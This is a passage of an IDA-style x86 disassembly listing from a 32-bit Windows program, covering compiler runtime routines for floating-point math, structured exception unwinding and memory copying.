var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_435A60
call sub_419BA8
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_415E21
call sub_419A70
pop ecx
test eax, eax
pop ecx
jle short loc_415E04
cmp eax, 2
jle short loc_415DF6
cmp eax, 3
jnz short loc_415E04
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_419218
add esp, 10h
jmp short loc_415E66
; ---------------------------------------------------------------------------
loc_415DF6: ; CODE XREF: sub_415D9B+3F�j
push esi
push ebx
call sub_419BA8
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_415E66
; ---------------------------------------------------------------------------
loc_415E04: ; CODE XREF: sub_415D9B+3A�j
; sub_415D9B+44�j
fld [ebp+arg_0]
fadd ds:dbl_4275E0
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_415E5E
; ---------------------------------------------------------------------------
loc_415E21: ; CODE XREF: sub_415D9B+2F�j
call sub_4199D1
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_415E44
loc_415E36: ; CODE XREF: sub_415D9B+AC�j
push esi
push ebx
call sub_419BA8
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_415E66
; ---------------------------------------------------------------------------
loc_415E44: ; CODE XREF: sub_415D9B+99�j
test bl, 20h
jnz short loc_415E36
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_415E5E: ; CODE XREF: sub_415D9B+84�j
call sub_4192CA
add esp, 1Ch
loc_415E66: ; CODE XREF: sub_415D9B+59�j
; sub_415D9B+67�j ...
pop esi
pop ebx
leave
retn
sub_415D9B endp
; =============== S U B R O U T I N E =======================================
sub_415E6A proc near ; CODE XREF: sub_4177E0+9�p
; sub_419C71+21�p
; DATA XREF: ...
call sub_415E82
call sub_419C71
mov dword_4927D0, eax
call sub_419C21
fnclex
retn
sub_415E6A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_415E82 proc near ; CODE XREF: sub_415E6A�p
mov eax, offset sub_41A05F
mov off_435BEC, offset sub_419CF4
mov off_435BE8, eax
mov off_435BF0, offset sub_419D5A
mov off_435BF4, offset sub_419C9A
mov off_435BF8, offset sub_419D42
mov off_435BFC, eax
retn
sub_415E82 endp
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_4927CC
mov dword_4927CC, ecx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415ECC proc near ; CODE XREF: sub_4020C1+1B�p
; sub_4020C1+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_415ECC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415EF3(double)
sub_415EF3 proc near ; CODE XREF: sub_402120+82�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_435A78
call sub_419BA8
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_415F79
call sub_419A70
pop ecx
test eax, eax
pop ecx
jle short loc_415F5C
cmp eax, 2
jle short loc_415F4E
cmp eax, 3
jnz short loc_415F5C
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_419218
add esp, 10h
jmp short loc_415FBE
; ---------------------------------------------------------------------------
loc_415F4E: ; CODE XREF: sub_415EF3+3F�j
push esi
push ebx
call sub_419BA8
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_415FBE
; ---------------------------------------------------------------------------
loc_415F5C: ; CODE XREF: sub_415EF3+3A�j
; sub_415EF3+44�j
fld [ebp+arg_0]
fadd ds:dbl_4275E0
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_415FB6
; ---------------------------------------------------------------------------
loc_415F79: ; CODE XREF: sub_415EF3+2F�j
call sub_4199D1
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_415F9C
loc_415F8E: ; CODE XREF: sub_415EF3+AC�j
push esi
push ebx
call sub_419BA8
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_415FBE
; ---------------------------------------------------------------------------
loc_415F9C: ; CODE XREF: sub_415EF3+99�j
test bl, 20h
jnz short loc_415F8E
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_415FB6: ; CODE XREF: sub_415EF3+84�j
call sub_4192CA
add esp, 1Ch
loc_415FBE: ; CODE XREF: sub_415EF3+59�j
; sub_415EF3+67�j ...
pop esi
pop ebx
leave
retn
sub_415EF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415FC2 proc near ; CODE XREF: sub_41A4D0+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_415FC2 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_415FF6 proc near ; CODE XREF: sub_41A845+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_415FF6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415FFD proc near ; CODE XREF: sub_41A681+199�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_415FFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416004 proc near ; CODE XREF: sub_41A681+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_416004 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41600B proc near ; CODE XREF: sub_4161D7+5C�p
; sub_41A4D0:loc_41A501�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_416033
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_421268 ; RtlUnwind
loc_416033: ; DATA XREF: sub_41600B+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_41600B endp
; ---------------------------------------------------------------------------
loc_41605A: ; CODE XREF: .text:004250A8�j
; .text:004250CD�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41A0D5
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push dword ptr [eax+1Ch]
push dword ptr [eax+28h]
push 0
push dword ptr [eax+18h]
call sub_41A41C
add esp, 10h
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4160AA proc near ; CODE XREF: sub_41A54B+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_4160FE
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41A8D0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_4160AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4160FE proc near ; DATA XREF: sub_4160AA+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41A0D5
add esp, 20h
pop ebp
retn
sub_4160FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416123 proc near ; CODE XREF: sub_41A317+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4161D7
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_4161A9
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_49286C
pop ecx
pop ecx
and [ebp+var_34], 0
loc_4161A9: ; DATA XREF: sub_416123+3C�o
cmp [ebp+var_4], 0
jz short loc_4161C6
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4161CF
; ---------------------------------------------------------------------------
loc_4161C6: ; CODE XREF: sub_416123+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4161CF: ; CODE XREF: sub_416123+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_416123 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161D7 proc near ; DATA XREF: sub_416123+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4161FA
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_416247
; ---------------------------------------------------------------------------
loc_4161FA: ; CODE XREF: sub_4161D7+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41A0D5
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_416238
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41600B
loc_416238: ; CODE XREF: sub_4161D7+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_416247: ; CODE XREF: sub_4161D7+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4161D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41624C proc near ; CODE XREF: sub_41A170+C6�p
; sub_41A317+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_4162A3
loc_41626A: ; CODE XREF: sub_41624C+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_416274
call sub_41A982
loc_416274: ; CODE XREF: sub_41624C+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_416289
cmp ecx, [eax+8]
jle short loc_41628E
loc_416289: ; CODE XREF: sub_41624C+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_41629A
loc_41628E: ; CODE XREF: sub_41624C+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_41629A: ; CODE XREF: sub_41624C+40�j
cmp [ebp+arg_4], 0
jge short loc_41626A
mov eax, [ebp+var_4]
loc_4162A3: ; CODE XREF: sub_41624C+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_4162B7
cmp esi, eax
jbe short loc_4162BC
loc_4162B7: ; CODE XREF: sub_41624C+65�j
call sub_41A982
loc_4162BC: ; CODE XREF: sub_41624C+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_41624C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162C8 proc near ; CODE XREF: sub_41D854+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4162E0
push [ebp+arg_0]
call sub_421268 ; RtlUnwind
loc_4162E0: ; DATA XREF: sub_4162C8+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4162C8 endp
; =============== S U B R O U T I N E =======================================
sub_4162E8 proc near ; DATA XREF: sub_41630A+A�o
; sub_416372+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_416309
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_416309: ; CODE XREF: sub_4162E8+10�j
retn
sub_4162E8 endp
; =============== S U B R O U T I N E =======================================
sub_41630A proc near ; CODE XREF: sub_41A5F1+D�p
; sub_41D854+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4162E8
push large dword ptr fs:0
mov large fs:0, esp
loc_416327: ; CODE XREF: sub_41630A:loc_416362�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_416364
cmp esi, [esp+1Ch+arg_4]
jz short loc_416364
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_416362
push 101h
mov eax, [ebx+esi*4+8]
call sub_41639E
call dword ptr [ebx+esi*4+8]
loc_416362: ; CODE XREF: sub_41630A+44�j
jmp short loc_416327
; ---------------------------------------------------------------------------
loc_416364: ; CODE XREF: sub_41630A+2A�j
; sub_41630A+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41630A endp
; =============== S U B R O U T I N E =======================================
sub_416372 proc near ; CODE XREF: sub_41A611+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4162E8
jnz short locret_416394
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_416394
mov eax, 1
locret_416394: ; CODE XREF: sub_416372+10�j
; sub_416372+1B�j
retn
sub_416372 endp
; =============== S U B R O U T I N E =======================================
sub_416395 proc near ; CODE XREF: sub_41A8D0+1E�p
; sub_41A8D0+40�p
push ebx
push ecx
mov ebx, offset dword_435A7C
jmp short loc_4163A8
sub_416395 endp
; =============== S U B R O U T I N E =======================================
sub_41639E proc near ; CODE XREF: sub_41630A+4F�p
; sub_41D854+78�p
push ebx
push ecx
mov ebx, offset dword_435A7C
mov ecx, [ebp+8]
loc_4163A8: ; CODE XREF: sub_416395+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41639E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4163B8 proc near ; CODE XREF: sub_402120+5�p
; sub_40232A+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_4163B8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4163D7 proc near ; CODE XREF: sub_40232A+69�p
; sub_402413+66�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_41AAED
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_416416
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416423
; ---------------------------------------------------------------------------
loc_416416: ; CODE XREF: sub_4163D7+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41A9D8
pop ecx
pop ecx
loc_416423: ; CODE XREF: sub_4163D7+3D�j
mov eax, esi
pop esi
leave
retn
sub_4163D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416430 proc near ; CODE XREF: sub_4029BE+3A�p
; sub_418342+2EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_416450
cmp edi, eax
jb loc_4165C8
loc_416450: ; CODE XREF: sub_416430+16�j
test edi, 3
jnz short loc_41646C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41648C
rep movsd
jmp ds:off_416578[edx*4]
; ---------------------------------------------------------------------------
loc_41646C: ; CODE XREF: sub_416430+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_416484
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41648C+4[eax*4]
; ---------------------------------------------------------------------------
loc_416484: ; CODE XREF: sub_416430+46�j
jmp dword ptr ds:loc_416588[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41648C: ; CODE XREF: sub_416430+31�j
; sub_416430+8E�j ...
jmp ds:off_41650C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4164A0
dd offset loc_4164CC
dd offset loc_4164F0
; ---------------------------------------------------------------------------
loc_4164A0: ; DATA XREF: sub_416430+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41648C
rep movsd
jmp ds:off_416578[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4164CC: ; DATA XREF: sub_416430+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41648C
rep movsd
jmp ds:off_416578[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4164F0: ; DATA XREF: sub_416430+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41648C
rep movsd
jmp ds:off_416578[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41650C dd offset loc_41656F ; DATA XREF: sub_416430:loc_41648C�r
dd offset loc_41655C
dd offset loc_416554
dd offset loc_41654C
dd offset loc_416544
dd offset loc_41653C
dd offset loc_416534
dd offset loc_41652C
; ---------------------------------------------------------------------------
loc_41652C: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_416534: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41653C: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_416544: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41654C: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_416554: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41655C: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41656F: ; CODE XREF: sub_416430:loc_41648C�j
; DATA XREF: sub_416430:off_41650C�o
jmp ds:off_416578[edx*4]
; ---------------------------------------------------------------------------
align 4
off_416578 dd offset loc_416588 ; DATA XREF: sub_416430+35�r
; sub_416430+92�r ...
dd offset loc_416590
dd offset loc_41659C
dd offset loc_4165B0
; ---------------------------------------------------------------------------
loc_416588: ; CODE XREF: sub_416430+35�j
; sub_416430+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_416590: ; CODE XREF: sub_416430+35�j
; sub_416430+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41659C: ; CODE XREF: sub_416430+35�j
; sub_416430+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4165B0: ; CODE XREF: sub_416430+35�j
; sub_416430+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4165C8: ; CODE XREF: sub_416430+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4165FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4165F0
std
rep movsd
cld
jmp ds:off_416710[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4165F0: ; CODE XREF: sub_416430+1B1�j
; sub_416430+208�j ...
neg ecx
jmp ds:off_4166C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4165FC: ; CODE XREF: sub_416430+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_416614
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_416614+4[eax*4]
; ---------------------------------------------------------------------------
loc_416614: ; CODE XREF: sub_416430+1D6�j
; DATA XREF: sub_416430+1DD�r
jmp ds:off_416710[ecx*4]
; ---------------------------------------------------------------------------
align 4
sub [esi+41h], ah
add [eax+66h], cl
inc ecx
add [eax+66h], dh
inc ecx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4165F0
std
rep movsd
cld
jmp ds:off_416710[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4165F0
std
rep movsd
cld
jmp ds:off_416710[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4165F0
std
rep movsd
cld
jmp ds:off_416710[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4166C4
dd offset loc_4166CC
dd offset loc_4166D4
dd offset loc_4166DC
dd offset loc_4166E4
dd offset loc_4166EC
dd offset loc_4166F4
off_4166C0 dd offset loc_416707 ; DATA XREF: sub_416430+1C2�r
; ---------------------------------------------------------------------------
loc_4166C4: ; DATA XREF: sub_416430+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4166CC: ; DATA XREF: sub_416430+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4166D4: ; DATA XREF: sub_416430+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4166DC: ; DATA XREF: sub_416430+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4166E4: ; DATA XREF: sub_416430+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4166EC: ; DATA XREF: sub_416430+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4166F4: ; DATA XREF: sub_416430+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_416707: ; CODE XREF: sub_416430+1C2�j
; DATA XREF: sub_416430:off_4166C0�o
jmp ds:off_416710[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_416710 dd offset loc_416720 ; DATA XREF: sub_416430+1B7�r
; sub_416430:loc_416614�r ...
